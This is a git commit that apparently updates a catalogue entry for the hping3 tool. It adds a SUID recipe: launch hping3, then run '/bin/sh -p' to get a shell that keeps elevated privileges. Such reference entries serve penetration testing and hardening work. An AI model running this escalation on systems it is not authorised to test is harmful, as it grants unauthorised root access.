Fix hping3 SUID

master
Andrea Cardaci 2021-01-18 09:19:35 +01:00 committed by GitHub
parent d6d3563e5d
commit c85513d5a6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 0 deletions

View File

@ -3,6 +3,10 @@ functions:
shell:
- code: |
hping3
/bin/sh
suid:
- code: |
./hping3
/bin/sh -p
sudo:
- code: |